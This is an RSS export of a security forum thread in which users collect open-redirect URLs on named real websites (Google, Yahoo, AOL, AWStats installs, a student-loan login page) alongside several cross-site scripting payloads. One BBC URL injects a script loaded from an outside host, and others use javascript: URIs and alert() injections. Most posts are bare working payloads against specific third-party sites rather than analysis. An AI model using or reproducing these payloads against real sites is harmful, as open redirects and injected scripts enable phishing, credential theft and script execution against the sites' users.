<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>So it begins - Redirects Edition</title>
        <description>Post your redirects here.. i'll start it off

just keeping your eye open for an http:// link as a parameter for a page (i.e. http:/example.com/content.php?blah=50&amp;url=http:/www.imaredirectlink.com&amp;p=6) is the easiest way to come across them..

that being said, i've never been to this site before, nor since &gt;.&gt;
http://www.sexocean.com/cgi-bin/tt.cgi?cmd=out&amp;url=http://sla.ckers.org/forum/profile.php?1,50 lol..

-maluc</description>
        <link>http://sla.ckers.org/forum/read.php?3,505,505#msg-505</link>
        <lastBuildDate>Mon, 20 May 2013 11:32:55 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,29614#msg-29614</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,29614#msg-29614</link>
            <description><![CDATA[Documentation/pages generated by ComponentOne's Doc To Help product have a (framed) open redirect vulnerability.  ComponentOne was notified almost a year ago. Anyways, this product has been used by lots of companies to create some public help pages...<br />
<br />
Try a Google search - allinurl:/nethelp/default.htm<br />
<br />
For example: <br />
http://www.softpro.hr/NetHelp/NetHelp/default.htm?turl=http://sla.ckers.org<br />
<br />
javascript and data work too.<br />
<br />
-Mazlo]]></description>
            <dc:creator>Mazlo</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 31 Jul 2009 13:08:59 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,28969#msg-28969</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,28969#msg-28969</link>
            <description><![CDATA[If you find an open redirect on Amazon you have an open redirect on google:<br />
<br />
http://www.google.com/tbproxy/redir?hl=en&amp;lt=isbn&amp;q=../../../open-redirect <br />
<br />
Greetz!!]]></description>
            <dc:creator>sirdarckcat</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 21 Jun 2009 23:34:12 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,28216#msg-28216</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,28216#msg-28216</link>
            <description><![CDATA[rsnake Wrote:<br />
-------------------------------------------------------<br />
&gt; Anyone want to make their own articles? <br />
&gt; http://www.bbc.co.uk/cgi-bin/navigation/mailto.pl?<br />
&gt; from=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%<br />
&gt; 3E&amp;subject=&amp;body=&amp;x=66&amp;y=15&amp;REFERER=http%3A%2F%2Fw<br />
&gt; ww.bbc.co.uk%2Fmobile%2Fweb%2Findex.shtml<br />
<br />
Page still not fixed, you can still make your own articles:<br />
<br />
http://www.bbc.co.uk/cgi-perl/navigation/mailto.pl?from=&amp;subject=&amp;body=%3C/textarea%3E%3Cscript%20src=%22http://jurriaanpruis.nl/bbc_js.js%22%3E%3C/script%3E&amp;x=66&amp;y=15&amp;REFERER=http%3A%2F%2Fwww.bbc.co.uk%2Fmobile%2Fweb%2Findex.shtml]]></description>
            <dc:creator>Jurpie</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 17 May 2009 04:16:43 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,26276#msg-26276</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,26276#msg-26276</link>
            <description><![CDATA[It may be obvious, but it redirects upon successful login. http://www.livejournal.com/?returnto=http%3A%2f%2fsla.ckers.org]]></description>
            <dc:creator>tx</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 26 Jan 2009 16:56:06 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,25603#msg-25603</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,25603#msg-25603</link>
            <description><![CDATA[Meant to post here: http://sla.ckers.org/forum/read.php?3,44,25604#msg-25604<br />
<br />
So in the meantime, enjoy this obvious link: http://anonym.to//http%3A//google.com]]></description>
            <dc:creator>tx</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 12 Dec 2008 22:59:32 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,25038#msg-25038</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,25038#msg-25038</link>
            <description><![CDATA[http://messagebot.com/cgi-bin/click.cgi?http://sla.ckers.org/forum/]]></description>
            <dc:creator>C1c4Tr1Z</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 24 Oct 2008 17:40:59 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,25030#msg-25030</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,25030#msg-25030</link>
            <description><![CDATA[http://barrasapo.mredir.sapo.pt/sla.ckers.org]]></description>
            <dc:creator>iNs4n3</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 24 Oct 2008 11:02:28 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,23870#msg-23870</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,23870#msg-23870</link>
            <description><![CDATA[Courtesy of McAfee.com: [<a href="http://server.iad.liveperson.net/hc/?cmd=repstate&amp;site=10599399&amp;imageUrl=http://www.google.com/%0A" rel="nofollow" >server.iad.liveperson.net</a>]]]></description>
            <dc:creator>trev</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Tue, 05 Aug 2008 18:16:50 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,23837#msg-23837</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,23837#msg-23837</link>
            <description><![CDATA[Another aol redirection:<br />
<br />
http://www.aol.com/redir.adp?_e_t=ap&amp;_a_v=2.0&amp;_a_i=100214839x1203415855x1200131198&amp;_url=http://www.xssed.com/]]></description>
            <dc:creator>C1c4Tr1Z</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 04 Aug 2008 21:50:15 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,23834#msg-23834</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,23834#msg-23834</link>
            <description><![CDATA[http://search.aol.tw/aol/redir?src=PTL&amp;clickedItemURN=http://wocares.com<br />
<br />
what's interesting about this is that aol.tw and aol.com have different security standards, because contrary to aol.tw, aol.com warns you<br />
<br />
http://search.aol.com/aol/redir?src=PTL&amp;clickedItemURN=http://wocares.com<br />
<br />
what's EVEN MORE funny is that the better security of aol.com contains XSS:<br />
<br />
hxxp://search.aol.com/aol/redirWarn?redirAuth=nauth&amp;clickedItemURN=http://wocares.com/sieben&quot;&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;]]></description>
            <dc:creator>Kyo</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 04 Aug 2008 20:58:16 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,23680#msg-23680</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,23680#msg-23680</link>
            <description><![CDATA[Haha, the awstats thing is mental.]]></description>
            <dc:creator>asilvermtzion</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 27 Jul 2008 17:15:47 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,23118#msg-23118</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,23118#msg-23118</link>
            <description><![CDATA[@trev: XSS too http://pierceive.com/cgi-bin/awstats/awredir.pl?url=javascript:eval(document.location.hash.substr(1))#alert%28document.domain%29 , gotta love it! :\]]></description>
            <dc:creator>tx</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 22 Jun 2008 15:00:24 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,23068#msg-23068</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,23068#msg-23068</link>
            <description><![CDATA[Nice job, AWStats - let's include a redirector, just in case somebody will need it:<br />
<br />
http://pierceive.com/cgi-bin/awstats/awredir.pl?url=http://google.com/<br />
<br />
A quote from that script:<br />
<br />
<pre class="bbcode">if (! $ENV{'GATEWAY_INTERFACE'}) {      # Run from command line
        print &quot;----- $PROG $VERSION (c) Laurent Destailleur -----\n&quot;;
        print &quot;This script is absolutely not required to use AWStats.\n&quot;;
        print &quot;It's a third tool that can help webmaster in their tracking tasks but is\n&quot;;
        print &quot;not used by AWStats engine.\n&quot;;
        print &quot;\n&quot;;
        print &quot;This tools must be used as a CGI script. When called as a CGI, it returns to\n&quot;;
        print &quot;browser a redirector to tell it to show the page provided in 'url' parameter.\n&quot;;
        print &quot;So, to use this script, you must replace HTML code for external links onto your\n&quot;;
        print &quot;HTML pages from\n&quot;;
        print &quot;&lt;a href=\&quot;http://externalsite/pagelinked\&quot;&gt;Link&lt;/a&gt;\n&quot;;
        print &quot;to\n&quot;;
        print &quot;&lt;a href=\&quot;http://mysite/cgi-bin/awredir.pl?url=http://externalsite/pagelinked\&quot;&gt;Link&lt;/a&gt;\n&quot;;
        print &quot;\n&quot;;
        print &quot;For your web visitor, there is no difference. However this allow you to track\n&quot;;
        print &quot;clicks done on links onto your web pages that point to external web sites,\n&quot;;
        print &quot;because an entry will be seen in your own server log, to awredir.pl script\n&quot;;
        print &quot;with url parameter, even if link was pointing to another external web server.\n&quot;;
        print &quot;\n&quot;;
        sleep 2;
        exit 0;
}</pre>
<br />
But does anybody care to read this?]]></description>
            <dc:creator>trev</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 20 Jun 2008 04:17:37 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,22802#msg-22802</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,22802#msg-22802</link>
            <description><![CDATA[https://login.manageyourloans.com/CALM/login.do?command=showLoginPage&amp;destAppName=SallieMae&amp;returnUrl=https://www.google.com]]></description>
            <dc:creator>CrYpTiC_MauleR</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 06 Jun 2008 01:51:54 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,22435#msg-22435</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,22435#msg-22435</link>
            <description><![CDATA[http://www.lexico.com/go/http://sla.ckers.org/forum/<br />
<br />
<br />
creators of dictionary.com, thesaurus.com, reference.com]]></description>
            <dc:creator>KleverOneR</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Thu, 22 May 2008 15:35:28 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,22168#msg-22168</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,22168#msg-22168</link>
            <description><![CDATA[http://www.backboris.com/includes/settext.php?redir=http://www.holditupforridicule.com/borisrace.JPG<br />
<br />
Newly elected Mayor of London! Lord save us!]]></description>
            <dc:creator>cyrus</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sat, 03 May 2008 09:02:11 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,20790#msg-20790</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,20790#msg-20790</link>
            <description><![CDATA[i don't understand. av.rds.yahoo.com is a fourth level domain. if they had properly implemented redirection attacks filtering wouldn't be it covered by rds.yahoo.com, being the *exact same* ?<br />
<br />
omg, please. no. they have *hardcoded* this fscking workaround ?<br />
<br />
well, looks like they're ready to form MicroHoo! they already have the same bug management system...]]></description>
            <dc:creator>Malkav</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Thu, 21 Feb 2008 14:38:20 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,20789#msg-20789</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,20789#msg-20789</link>
            <description><![CDATA[http://clk.about.com/?zi=1/1&amp;zu=http://sla.ckers.org<br />
<br />
also xss, if you prefer: http://clk.about.com/?zi=1/1&amp;zu=javascript:alert%28document.domain%29]]></description>
            <dc:creator>tx</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Thu, 21 Feb 2008 14:17:45 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,20555#msg-20555</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,20555#msg-20555</link>
            <description><![CDATA[Another yahoo redirect, I don't think that this has been disclosed yet: http://av.rds.yahoo.com/**http%3a//www.google.com/<br />
<br />
There was a similar one <a href="http://sla.ckers.org/forum/read.php?3,505,7449#msg-7449" rel="nofollow" >posted before</a>, but that now gives a warning page: http://rds.yahoo.com/**http%3a//www.google.com/]]></description>
            <dc:creator>tx</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Wed, 13 Feb 2008 15:28:13 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,20484#msg-20484</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,20484#msg-20484</link>
            <description><![CDATA[http://www.globalsecurity.org/cgi-bin/texis.cgi/webinator/search/redir.html?u=http%3A//sla.ckers.org<br />
<br />
EDIT: This appears to affect all versions of Thunderstone's Webinator software: http://search.thunderstone.com/texis/redir/main.bin?q=&amp;u=http://www.google.com]]></description>
            <dc:creator>tx</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 11 Feb 2008 16:08:13 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,18684#msg-18684</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,18684#msg-18684</link>
            <description><![CDATA[http://dev.mysql.com/get/anyQueryString/from/http://asdf.com/<br />
<br />
anyQueryString is modifiable, as is asdf.com/<br />
<br />
-maluc]]></description>
            <dc:creator>maluc</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Tue, 01 Jan 2008 11:27:57 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,18441#msg-18441</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,18441#msg-18441</link>
            <description><![CDATA[http://www.becks.de/iframes/becksit.php?url=http://sla.ckers.org<br />
http://www.becksbeer.com/lda.aspx?ReturnUrl=http://sla.ckers.org<br />
...]]></description>
            <dc:creator>Reiners</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 17 Dec 2007 17:33:29 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,18435#msg-18435</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,18435#msg-18435</link>
            <description><![CDATA[<a href="http://www.us.bbb.org/ViewReport.aspx?biz=lspdc.com&amp;bbb=0027&amp;sess=32b7aa40a693b0296624c132240947d0d39365d555819ead6b5e59cc7f257bdeb1fc30198daafdfe88937338af1519acbeafcc25e5a3153db0320ba5d0c0579a775c83632dd36d7971b95d9f85e64bdb&amp;lnk=http://sla.ckers.org" rel="nofollow" >Better Business Bureau</a>]]></description>
            <dc:creator>thrill</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 17 Dec 2007 13:40:16 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,18304#msg-18304</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,18304#msg-18304</link>
            <description><![CDATA[friendster..<br />
&lt;div id=&quot;mylousycode&quot; expr=&quot;window.location('http://www.google.com')&quot; style=&quot;background:url('javascript:eval(document.all.mylousycode.expr)')&quot;&gt;&lt;/div&gt;]]></description>
            <dc:creator>krazl</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Thu, 13 Dec 2007 22:06:59 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,16307#msg-16307</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,16307#msg-16307</link>
            <description><![CDATA[both work on other tld's too like .com, .fi, etc]]></description>
            <dc:creator>thornmaker</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Wed, 26 Sep 2007 22:24:19 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,16296#msg-16296</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,16296#msg-16296</link>
            <description><![CDATA[http://images.google.nl/local_url?q=http://sla.ckers.org<br />
http://maps.google.nl/local_url?q=http://sla.ckers.org<br />
<br />
Might work on more sub-domains.]]></description>
            <dc:creator>Spyware</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Wed, 26 Sep 2007 15:03:50 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,16241#msg-16241</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,16241#msg-16241</link>
            <description><![CDATA[krazl Wrote:<br />
-------------------------------------------------------<br />
&gt; http://www.rpi2u.com/message.asp?message=somewhere<br />
&gt; Here..<br />
<br />
That is not a redirect. It is a XSS hole http://www.rpi2u.com/message.asp?message=&lt;script&gt;alert(1)&lt;/script&gt; though, which you could post in the other &quot;So it begins...&quot; forum.]]></description>
            <dc:creator>Spyware</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Tue, 25 Sep 2007 04:51:31 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,16228#msg-16228</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,16228#msg-16228</link>
            <description><![CDATA[lol]]></description>
            <dc:creator>Anonymous User</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Tue, 25 Sep 2007 02:08:36 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,16215#msg-16215</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,16215#msg-16215</link>
            <description><![CDATA[http://www.rpi2u.com/message.asp?message=somewhereHere..]]></description>
            <dc:creator>krazl</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 24 Sep 2007 23:38:13 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,505,16110#msg-16110</guid>
            <title>Re: So it begins - Redirects Edition</title>
            <link>http://sla.ckers.org/forum/read.php?3,505,16110#msg-16110</link>
            <description><![CDATA[http://news.google.com/news/url?sa=t&amp;ct=au/19-0&amp;fp=46f30982c5d4752c&amp;ei=ID7zRu-0HIzQqgOUsNDpAw&amp;url=http%3A//sla.ckers.org&amp;sig2=xnaVXpfaSO3NQ7bX5bpqWg<br />
<br />
<br />
:)]]></description>
            <dc:creator>Cynic</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Thu, 20 Sep 2007 23:54:50 -0500</pubDate>
        </item>
    </channel>
</rss>
